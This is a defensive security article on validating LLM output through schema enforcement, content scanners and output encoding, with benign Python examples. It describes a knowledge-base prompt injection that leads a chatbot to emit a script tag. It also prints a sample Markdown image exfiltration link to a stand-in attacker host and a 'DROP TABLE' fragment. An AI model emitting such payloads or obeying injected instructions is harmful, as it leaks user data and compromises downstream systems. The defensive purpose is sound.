Skip to content

LLM Output Validation Patterns: Structured Outputs, Schema Enforcement, and Content Filtering

Series: AI Security in Practice
Pillar: 3: Defend and Harden
Difficulty: Intermediate
Author: Paul Lawlor
Date: 11 March 2026
Reading time: 14 minutes

A practitioner’s guide to the three layers of LLM output validation: constrained decoding for structural guarantees, post-generation validation for content safety, and context-aware encoding for downstream protection.


  1. The problem: why LLM output is untrusted
  2. How output validation works
  3. A taxonomy of output validation patterns
  4. Worked examples
  5. Detection and defence in depth
  6. Limitations and open problems
  7. Practical recommendations
  8. Further reading

1. The problem: why LLM output is untrusted

Section titled “1. The problem: why LLM output is untrusted”

A financial services firm deploys an internal chatbot that answers employee questions about company policy. The chatbot retrieves documents from a knowledge base, passes them to a large language model, and renders the response in a web dashboard. Six weeks after launch, a penetration tester discovers that by embedding a crafted instruction in a policy document stored in the knowledge base, they can make the chatbot return a response containing a <script> tag. The dashboard renders it. The tester now has cross-site scripting in an internal tool that handles HR and compliance queries.

This is not a theoretical scenario. It is the exact class of vulnerability described in OWASP LLM05:2025 Improper Output Handling: “insufficient validation, sanitization, and handling of the outputs generated by large language models before they are passed downstream to other components and systems.” 1 The consequences range from XSS and CSRF in web browsers to SSRF, privilege escalation, and remote code execution on backend systems. 1

The core issue is that LLM output is structurally indistinguishable from user input. A model does not have a privileged output channel that guarantees safety. It generates tokens based on statistical patterns, and those tokens can contain anything: valid JSON, malformed JSON, SQL injection payloads, JavaScript, Markdown image exfiltration links, or fabricated data that looks plausible. When an application passes this output directly to a database query, a shell command, an HTML template, or another LLM in an agentic chain, the model’s response becomes an attack vector.

Three categories of output failure create security risk:

Structural failures. The model returns data in an unexpected format. An API that expects JSON receives free-form text, or JSON with missing fields, wrong types, or extra properties. Downstream parsers crash or fall back to unsafe defaults. In agentic systems where one model’s output feeds another model’s input, a single malformed response can cascade through the chain.

Content injection. The model’s response contains executable content that the application treats as trusted: script tags, SQL fragments, shell commands, or Markdown that triggers unintended rendering. This is the classic output handling vulnerability. Since LLM output can be influenced by prompt injection (both direct and indirect), an attacker does not need to control the model directly. They need only to place malicious instructions in a document, email, or web page that the model processes. 2

Information leakage. The model includes personally identifiable information (PII), API keys, internal system details, or confidential business data in its response. Even if the model was not trained on this data, retrieval-augmented generation (RAG) pipelines can surface it from the knowledge base, and the model may include it in the response without any awareness that it should be redacted. 3

Output validation is the practice of treating every LLM response as untrusted input and applying structured verification before it reaches any downstream system or user interface. It is not optional. It is the output equivalent of input validation, and in LLM applications it is arguably more important, because the model’s output surface is richer and less predictable than a web form.


Output validation for LLM applications operates at two distinct levels: constraining what the model can generate, and verifying what it did generate. These are complementary, not interchangeable.

Constrained decoding: enforcement at generation time

Section titled “Constrained decoding: enforcement at generation time”

The strongest form of output validation prevents invalid output from ever being produced. Constrained decoding modifies the model’s token sampling process so that only tokens consistent with a target schema can be selected at each step. The provider compiles a JSON Schema into a grammar and masks out tokens that would violate the schema before sampling. 4

OpenAI introduced this as Structured Outputs in August 2024. When you set response_format with a JSON Schema and strict: true, or set strict: true on a function definition, the model is constrained to produce output that exactly matches the schema. OpenAI reports 100% schema conformance on their evaluation suite, compared to under 40% with unconstrained generation and prompting alone. 4 Anthropic followed in late 2025, releasing constrained decoding for Claude models via the output_config.format parameter and strict: true on tool definitions. 5 Google’s Gemini API offers a similar response_schema parameter. 6

Constrained decoding guarantees structural validity: correct field names, correct types, required fields present, no extraneous properties. It does not guarantee semantic safety. A model can produce a perfectly valid JSON object where a summary field contains a script injection payload, or a recommendation field contains fabricated data. Schema conformance is necessary but not sufficient.

Post-generation validation: verification after the fact

Section titled “Post-generation validation: verification after the fact”

Post-generation validation treats the model’s output as untrusted input and runs it through a validation pipeline before passing it downstream. This is where libraries like Instructor, Guardrails AI, and LLM Guard operate.

The typical pipeline has three stages:

  1. Parse and validate structure. Deserialise the response into a typed object. Verify that it matches the expected schema, including field types, value ranges, enum constraints, and string formats. If it fails, either reject the response or retry with error context sent back to the model.

  2. Validate content. Run domain-specific checks on the parsed values. Does the email field contain a valid email? Does the sql_query field contain only SELECT statements? Does the summary field contain any HTML tags, script elements, or Markdown image links? Does it contain PII that should be redacted?

  3. Encode and sanitise for context. Apply output encoding appropriate to the downstream consumer. HTML-encode for web rendering. Parameterise for SQL. Escape for shell commands. This is the same context-aware encoding that web application security has practised for decades, applied to a new source of untrusted content. 7

A common mistake is to assume that structured outputs from the API eliminate the need for post-generation validation. They do not. Constrained decoding solves the structural problem: you will always get valid JSON with the right shape. But within those correctly typed fields, the content remains model-generated and unpredictable. A string field can contain anything that is a valid string, including injection payloads.

The reverse mistake is equally dangerous: relying only on post-generation validation without requesting structured output. If the model returns free-form text when you expected JSON, your parser fails before validation even begins. Regex-based extraction from free-form responses is fragile and error-prone.

The robust pattern is to use both: constrained decoding to guarantee structure, and post-generation validation to verify content. This defence-in-depth approach mirrors the layered security model that OWASP recommends for LLM applications. 1


3. A taxonomy of output validation patterns

Section titled “3. A taxonomy of output validation patterns”

Output validation patterns fall into three layers. Each addresses a different class of risk, and production systems typically need all three.

Layer 1: Schema enforcement (structural guarantees)

Section titled “Layer 1: Schema enforcement (structural guarantees)”

Schema enforcement ensures the model’s response conforms to a predefined data structure. This layer prevents parsing failures, type errors, and unexpected fields from propagating downstream.

Provider-native structured outputs. OpenAI, Anthropic, and Google now offer constrained decoding at the API level. You supply a JSON Schema, and the model is physically constrained to produce conforming output. This is the most reliable structural guarantee available because it operates during token generation, not after. 4 5

Client-side schema validation with Instructor. The Instructor library patches LLM client SDKs to accept a Pydantic model as a response_model parameter. It sends the schema to the model, parses the response, validates it against the Pydantic model, and automatically retries with error feedback if validation fails. 8 This works with providers that support function calling or structured outputs, including OpenAI, Anthropic, Google, Mistral, and local models via Ollama. Instructor handles the retry loop, so you write a Pydantic model and get a typed, validated object back.

Guardrails AI. The Guardrails AI framework takes a different approach: you define a Guard with a set of validators, and the framework runs each validator against the model’s output. Validators can check structure (JSON schema, regex patterns, field lengths) and content (PII detection, toxicity, hallucination). Failed validations trigger configurable actions: fix, reask, filter, refrain, or raise an exception. 9

Layer 2: Content validation (semantic safety)

Section titled “Layer 2: Content validation (semantic safety)”

Content validation inspects the values within a structurally valid response. A JSON object with correct types can still contain dangerous or inappropriate content.

Regex and pattern matching. The simplest content validators use regular expressions to detect known-bad patterns: <script> tags, SQL keywords in unexpected fields, shell metacharacters, Markdown image links with external URLs. These are fast, deterministic, and easy to audit. They catch obvious injections but miss obfuscated variants.

PII detection and redaction. Libraries like LLM Guard and Presidio (from Microsoft) scan text for personally identifiable information: names, email addresses, phone numbers, national insurance numbers, credit card numbers. LLM Guard’s Sensitive output scanner uses named-entity recognition models and regex patterns to detect and redact PII before it reaches the user. 10 This is critical for RAG applications where the knowledge base may contain personal data that the model surfaces in its response.

Factual consistency and grounding. LLM Guard’s FactualConsistency scanner compares the model’s response against the provided context to detect hallucination. 10 AWS Bedrock Guardrails offers a similar contextual grounding check that evaluates whether the response is grounded in the source documents. 11 These checks reduce the risk of the model fabricating information, though they are not foolproof.

Toxicity and bias detection. Content classifiers evaluate whether the response contains hate speech, insults, sexual content, violence, or other harmful material. LLM Guard provides Toxicity and Bias output scanners. 10 Bedrock Guardrails offers configurable content filters with adjustable severity thresholds (None, Low, Medium, High) across six categories. 11

Layer 3: Context-aware encoding (downstream protection)

Section titled “Layer 3: Context-aware encoding (downstream protection)”

Even after structural and content validation, the output must be encoded appropriately for its destination. This is the final defence layer, and it mirrors decades of web application security practice.

HTML encoding for content rendered in browsers. Prevents XSS from any content that passed earlier filters.

SQL parameterisation for content used in database queries. Never concatenate LLM output into SQL strings, regardless of what content validation you performed.

Shell escaping for content passed to system commands. Better yet, avoid passing LLM output to shell commands entirely.

JSON serialisation for content passed to APIs. Use proper serialisation libraries rather than string interpolation.

This layer is not specific to LLMs. It is the same output encoding that the OWASP Application Security Verification Standard (ASVS) Section 5 prescribes for all untrusted input. 7 The difference is that with LLMs, the untrusted input comes from your own application’s AI component rather than from an external user.


The following examples demonstrate each validation layer in practice. All use Python and assume you have the relevant packages installed.

Example 1: OpenAI Structured Outputs with strict mode

Section titled “Example 1: OpenAI Structured Outputs with strict mode”

This example requests a structured response from OpenAI and gets a schema-guaranteed JSON object back. No parsing or retry logic is required.

from openai import OpenAI
from pydantic import BaseModel
client = OpenAI()
class PolicyAnswer(BaseModel):
question: str
answer: str
confidence: float
sources: list[str]
completion = client.beta.chat.completions.parse(
model="gpt-4o",
messages=[
{"role": "system", "content": "Answer policy questions. Return structured data."},
{"role": "user", "content": "What is our data retention policy for customer PII?"}
],
response_format=PolicyAnswer,
)
result = completion.choices[0].message.parsed
print(result.answer)
print(result.confidence)

The response is guaranteed to match the PolicyAnswer schema: four fields, correct types, no extra properties. If the model cannot conform, the API returns a refusal rather than malformed output. 4 This eliminates structural failures but says nothing about whether the answer field contains safe content.

Example 2: Instructor with Pydantic validation

Section titled “Example 2: Instructor with Pydantic validation”

Instructor adds automatic retry with error feedback. Here the Pydantic model includes field validators that enforce content constraints.

import instructor
from openai import OpenAI
from pydantic import BaseModel, field_validator
client = instructor.from_openai(OpenAI())
class SafeSummary(BaseModel):
title: str
summary: str
risk_level: str
@field_validator("summary")
@classmethod
def no_html_tags(cls, v: str) -> str:
import re
if re.search(r"<[^>]+>", v):
raise ValueError("Summary must not contain HTML tags")
return v
@field_validator("risk_level")
@classmethod
def valid_risk_level(cls, v: str) -> str:
allowed = {"low", "medium", "high", "critical"}
if v.lower() not in allowed:
raise ValueError(f"risk_level must be one of {allowed}")
return v.lower()
result = client.chat.completions.create(
model="gpt-4o",
response_model=SafeSummary,
max_retries=2,
messages=[
{"role": "user", "content": "Summarise the vulnerability in CVE-2024-5184."}
],
)
print(result.summary)

If the model returns HTML in the summary or an invalid risk level, Instructor catches the Pydantic validation error, sends the error message back to the model, and retries. After max_retries attempts, it raises an exception. 8 This pattern combines structural enforcement with content-level validation in a single call.

LLM Guard runs a battery of output scanners independently of the LLM provider. This example checks for PII, toxicity, and relevance.

from llm_guard.output_scanners import Sensitive, Toxicity, Relevance
prompt = "What is our refund policy for enterprise customers?"
model_output = "Contact John Smith at john.smith@example.com for refunds over £10,000."
scanners = [
Sensitive(entity_types=["PERSON", "EMAIL_ADDRESS", "PHONE_NUMBER"], redact=True),
Toxicity(threshold=0.7),
Relevance(threshold=0.5),
]
sanitised_output = model_output
for scanner in scanners:
sanitised_output, is_valid, risk_score = scanner.scan(prompt, sanitised_output)
if not is_valid:
print(f"Scanner {scanner.__class__.__name__} flagged output (risk: {risk_score})")
print(sanitised_output)

The Sensitive scanner detects the email address and person name, redacting them before the response reaches the user. The Toxicity scanner checks for harmful language. The Relevance scanner verifies the response is relevant to the original prompt. 10 Each scanner returns the (potentially modified) output, a validity flag, and a risk score. You chain them in sequence, and any scanner can block or modify the response.

After validation, encode the output for its destination. This is the final layer.

import html
import json
def render_for_web(validated_output: str) -> str:
return html.escape(validated_output)
def render_for_api(validated_data: dict) -> str:
return json.dumps(validated_data, ensure_ascii=True)
def build_query(validated_input: str, db_cursor) -> None:
db_cursor.execute(
"SELECT * FROM policies WHERE topic = %s",
(validated_input,)
)

These are not LLM-specific techniques. They are the same encoding practices that prevent XSS, SQL injection, and command injection in any web application. The difference is that with LLM applications, developers sometimes forget that the model’s output is untrusted input that needs the same treatment. 7


No single validation layer is sufficient. Production LLM applications need a defence-in-depth strategy that combines multiple layers, with monitoring to detect what the layers miss.

A complete output validation pipeline processes every model response through five stages:

  1. Schema enforcement. Use constrained decoding (structured outputs) at the API level to guarantee structural conformance. This eliminates parsing failures and type errors.

  2. Field-level validation. Validate individual field values against business rules using Pydantic validators, Guardrails AI validators, or custom logic. Check string lengths, numeric ranges, enum membership, date formats, and URL patterns.

  3. Content scanning. Run content-level scanners to detect PII, toxicity, bias, malicious URLs, and factual inconsistency. Tools like LLM Guard, Bedrock Guardrails, and NeMo Guardrails output rails operate at this layer. 10 11 12

  4. Context-aware encoding. Encode the validated output for its destination: HTML escaping for web rendering, parameterised queries for databases, proper serialisation for APIs. Never skip this step, even if content scanning passed.

  5. Logging and anomaly detection. Log every model response (before and after validation), every validation failure, and every modification made by scanners. Monitor for patterns that suggest exploitation attempts: repeated validation failures from the same session, outputs that consistently trigger PII redaction, or responses with unusually high risk scores.

When validation fails, the application must decide what to do. The options, in order of increasing risk tolerance:

Block and return a safe fallback. Replace the response with a generic message. This is the safest option and appropriate for high-risk applications (financial advice, healthcare, legal). The user sees “I cannot provide that information” rather than a potentially harmful response.

Redact and return. Remove or mask the problematic content (e.g. replace detected PII with [REDACTED]) and return the rest of the response. LLM Guard’s Sensitive scanner supports this mode. 10 This preserves useful content while removing specific risks.

Retry with feedback. Send the validation error back to the model and request a corrected response. Instructor’s retry mechanism does this automatically. 8 Set a maximum retry count (two or three) to avoid infinite loops. Be aware that retrying creates latency and cost, and there is no guarantee the model will produce a valid response on the next attempt.

Log and allow. Pass the response through but log the validation failure for review. This is appropriate only for low-risk applications where blocking would create an unacceptable user experience and the content risk is manageable. Even in this mode, context-aware encoding must still be applied.

Output validation generates signals that feed into your security monitoring. Key metrics to track:

  • Validation failure rate by scanner. A sudden increase in PII detections may indicate a data leak in the knowledge base. A spike in toxicity flags may indicate prompt injection attacks.
  • Redaction rate. How often are scanners modifying responses? A consistently high redaction rate suggests the model or knowledge base needs attention.
  • Retry rate. How often does Instructor or your retry logic need to re-prompt the model? Frequent retries increase cost and latency.
  • Response latency with validation. Each scanner adds latency. Monitor the total pipeline latency to ensure it remains within acceptable bounds for your users.

Alert on anomalous patterns. If a single user session triggers ten consecutive PII detections, that warrants investigation. If the model suddenly starts producing outputs that fail factual consistency checks at a higher rate, the knowledge base may have been tampered with.


Output validation significantly reduces risk, but it has hard boundaries that practitioners must understand.

Schema enforcement does not prevent semantic attacks

Section titled “Schema enforcement does not prevent semantic attacks”

Constrained decoding guarantees that the model produces structurally valid output. It says nothing about what the valid values mean. A string field constrained by a JSON Schema is still a string, and a string can contain anything: a social engineering message, a convincing fabrication, or an injection payload that only becomes dangerous in the downstream context. If your schema includes a sql_query field of type string, constrained decoding will ensure the field exists and is a string. It will not prevent the string from containing DROP TABLE users;. Schema enforcement is a structural control, not a semantic one.

Content filters have false positives and false negatives

Section titled “Content filters have false positives and false negatives”

Every content scanner operates on a threshold. Set it too low, and you block legitimate responses. Set it too high, and you miss actual threats. Toxicity classifiers struggle with domain-specific language: a medical chatbot discussing “malignant” conditions or a cybersecurity tool describing attack techniques will trigger toxicity filters tuned for general conversation. PII detectors produce false positives on strings that resemble but are not PII (e.g. fictional names in examples, product codes that match phone number patterns).

False negatives are harder to measure but more dangerous. Obfuscated injection payloads (Base64-encoded scripts, Unicode homoglyphs, split across multiple fields) routinely bypass regex-based scanners. ML-based classifiers are more robust but not immune, particularly to adversarial inputs designed to evade classification. 13

Each scanner in the validation pipeline adds processing time. Regex checks are fast (sub-millisecond). ML-based classifiers (PII detection, toxicity, factual consistency) can add tens to hundreds of milliseconds per call, depending on the model size and whether they run locally or via API. For streaming responses, output validation either requires buffering the full response before validation (which defeats the purpose of streaming) or running validators incrementally on partial content (which limits what can be checked).

LLM Guard runs locally and adds no API cost, but it requires compute. Bedrock Guardrails charges per policy type and per token evaluated. 11 At high throughput, validation costs can become a meaningful fraction of the overall inference cost. Teams should benchmark their validation pipeline and make deliberate trade-offs between coverage and latency.

In agentic architectures where multiple LLMs communicate, each model’s output becomes the next model’s input. Output validation must occur at every boundary in the chain, not at the final output to the user. If Agent A produces a response that contains an indirect prompt injection payload, and that response is passed directly to Agent B as context, Agent B may follow the injected instruction. Validating only the final output to the user is insufficient because the damage occurs at the intermediate step. 14

This creates an engineering challenge: every inter-agent message needs its own validation pipeline, which multiplies latency and complexity. Most agentic frameworks do not enforce this by default. Developers must build it explicitly.

The fundamental limitation is that output validation is reactive. It catches known patterns and trained-on categories. Novel attack techniques, domain-specific injection vectors, and subtle misinformation that does not trigger any classifier will pass through. Output validation reduces the attack surface; it does not eliminate it. It must be combined with input validation, least-privilege architecture, human review for high-risk decisions, and continuous red-teaming to discover what the validators miss.


These recommendations are ordered by impact. Start at the top and work down.

Always use structured outputs when available

Section titled “Always use structured outputs when available”

If your LLM provider supports constrained decoding (OpenAI Structured Outputs, Anthropic’s JSON outputs via output_config.format or strict tool use via strict: true, Google’s response_schema), use it. Define the tightest schema you can: use enums instead of open strings where the set of valid values is known, set maxLength on string fields, mark all fields as required, and set additionalProperties: false. 4 5 This eliminates an entire class of structural failures at zero application-side cost.

If your provider does not support constrained decoding, use Instructor with a Pydantic response model and automatic retries. This is the next best option: it provides structural validation with self-correcting behaviour. 8

Add content validators for every field that reaches a user or downstream system

Section titled “Add content validators for every field that reaches a user or downstream system”

Do not assume that a structurally valid response is a safe response. For every field in your output schema, ask: what could go wrong if this field contained malicious content?

  • String fields rendered in HTML: validate for script tags, event handlers, and Markdown image exfiltration (![](https://attacker.com/steal?data=...)).
  • String fields used in SQL: never concatenate. Always parameterise.
  • Fields containing URLs: validate against an allowlist of domains.
  • Fields that should not contain PII: run a PII scanner (LLM Guard Sensitive, Microsoft Presidio, or regex-based checks for the specific PII types relevant to your domain). 10

Implement PII scanning on every RAG application

Section titled “Implement PII scanning on every RAG application”

RAG pipelines retrieve documents that may contain personal data. The model often includes that data in its response. Unless you are certain your knowledge base is fully anonymised (and can prove it under audit), scan every output for PII and redact before returning to the user. LLM Guard’s Sensitive scanner, configured with the entity types relevant to your jurisdiction (names, emails, phone numbers, national insurance numbers, postcodes), is a practical starting point. 10

Treat LLM output with the same rigour you apply to user input in a web application. Use html.escape() for web rendering. Use parameterised queries for databases. Use proper serialisation for API responses. This is not optional, and it is not redundant with content validation. Content validators check for known-bad patterns; output encoding neutralises anything that slipped through. 7

Before your application reaches production, instrument the validation pipeline to log:

  • Every validation failure, including which scanner flagged it and what the original content was.
  • Every output modification (redactions, substitutions).
  • Aggregate metrics: failure rate, redaction rate, retry rate, and validation latency.

Set alerts on anomalous spikes. A sudden increase in PII detections may mean your knowledge base has been updated with unredacted data. A spike in toxicity flags may indicate a prompt injection campaign.

Validate at every boundary in agentic chains

Section titled “Validate at every boundary in agentic chains”

If your architecture involves multiple LLMs or agents communicating, apply output validation at every boundary, not at the final output to the user. Each agent’s response is untrusted input to the next agent. This is more expensive than validating once, but intermediate injection is one of the most dangerous attack vectors in agentic systems. 14

Test your validators with adversarial inputs

Section titled “Test your validators with adversarial inputs”

Include output validation in your red-teaming process. Feed your validation pipeline with known injection payloads (OWASP testing guides, prompt injection datasets, XSS payloads from the PayloadsAllTheThings repository) and verify that your scanners catch them. Test with obfuscated variants: Base64 encoding, Unicode substitution, payload splitting across fields. If your validators pass adversarial testing, increase confidence. If they fail, tighten thresholds or add additional scanners.


Standards and frameworks:

  • OWASP Top 10 for LLM Applications (2025), particularly LLM05: Improper Output Handling. 1
  • OWASP Application Security Verification Standard (ASVS) v4, Section 5: Validation, Sanitization and Encoding. 7
  • NIST AI 100-2e2023: Adversarial Machine Learning: A Taxonomy and Terminology of Attacks and Mitigations. 15

Tools:

  • Instructor (Python, TypeScript, Go, Ruby): structured LLM output extraction with Pydantic validation and automatic retries. 8
  • LLM Guard (Python): input and output scanners for PII, toxicity, bias, relevance, and factual consistency. 10
  • Guardrails AI (Python): validator framework with a hub of community-contributed validators. 9
  • NeMo Guardrails (Python): programmable guardrails using Colang, with five rail types including output rails. 12
  • Microsoft Presidio: PII detection and anonymisation for text and images. 16
  • Amazon Bedrock Guardrails: managed content filtering, PII detection, and contextual grounding for Bedrock models. 11

Research:

  • Greshake et al., “Not What You’ve Signed Up For: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection,” arXiv:2302.12173. Demonstrates how indirect prompt injection in retrieved documents can control model output. 14
  • Zou et al., “Universal and Transferable Adversarial Attacks on Aligned Language Models,” arXiv:2307.15043. Shows that adversarial suffixes can bypass safety alignment, underscoring why output validation cannot rely on model behaviour alone. 13

Related articles on this site:


  1. OWASP, “LLM05:2025 Improper Output Handling,” OWASP Top 10 for LLM Applications, 2025. https://genai.owasp.org/llmrisk/llm052025-improper-output-handling/ 2 3 4

  2. OWASP, “LLM01:2025 Prompt Injection,” OWASP Top 10 for LLM Applications, 2025. https://genai.owasp.org/llmrisk/llm01-prompt-injection/

  3. OWASP, “LLM02:2025 Sensitive Information Disclosure,” OWASP Top 10 for LLM Applications, 2025. https://genai.owasp.org/llmrisk/llm022025-sensitive-information-disclosure/

  4. OpenAI, “Introducing Structured Outputs in the API,” August 2024. https://openai.com/index/introducing-structured-outputs-in-the-api 2 3 4 5

  5. Anthropic, “Structured Outputs,” Claude API Documentation, 2025. https://docs.anthropic.com/en/docs/build-with-claude/structured-outputs 2 3

  6. Google, “Structured Output,” Gemini API Documentation, 2025. https://ai.google.dev/gemini-api/docs/structured-output

  7. OWASP, “ASVS v4 – Section 5: Validation, Sanitization and Encoding,” 2021. https://owasp-aasvs4.readthedocs.io/en/latest/V5.html 2 3 4 5

  8. Jason Liu, “Instructor: Structured LLM Outputs,” 2024. https://python.useinstructor.com/ 2 3 4 5

  9. Guardrails AI, “Validators,” 2024. https://guardrailsai.com/docs/concepts/validators/ 2

  10. Protect AI, “LLM Guard: The Security Toolkit for LLM Interactions,” 2024. https://protectai.github.io/llm-guard/ 2 3 4 5 6 7 8 9

  11. AWS, “Amazon Bedrock Guardrails,” 2024. https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails.html 2 3 4 5

  12. NVIDIA, “NeMo Guardrails,” 2024. https://github.com/NVIDIA/NeMo-Guardrails 2

  13. Zou et al., “Universal and Transferable Adversarial Attacks on Aligned Language Models,” arXiv:2307.15043, 2023. https://arxiv.org/abs/2307.15043 2

  14. Greshake et al., “Not What You’ve Signed Up For: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection,” arXiv:2302.12173, 2023. https://arxiv.org/abs/2302.12173 2 3

  15. NIST, “Adversarial Machine Learning: A Taxonomy and Terminology of Attacks and Mitigations,” NIST AI 100-2e2023, 2024. https://nvlpubs.nist.gov/nistpubs/ai/NIST.AI.100-2e2023.pdf

  16. Microsoft, “Presidio: Data Protection and De-identification SDK,” 2024. https://microsoft.github.io/presidio/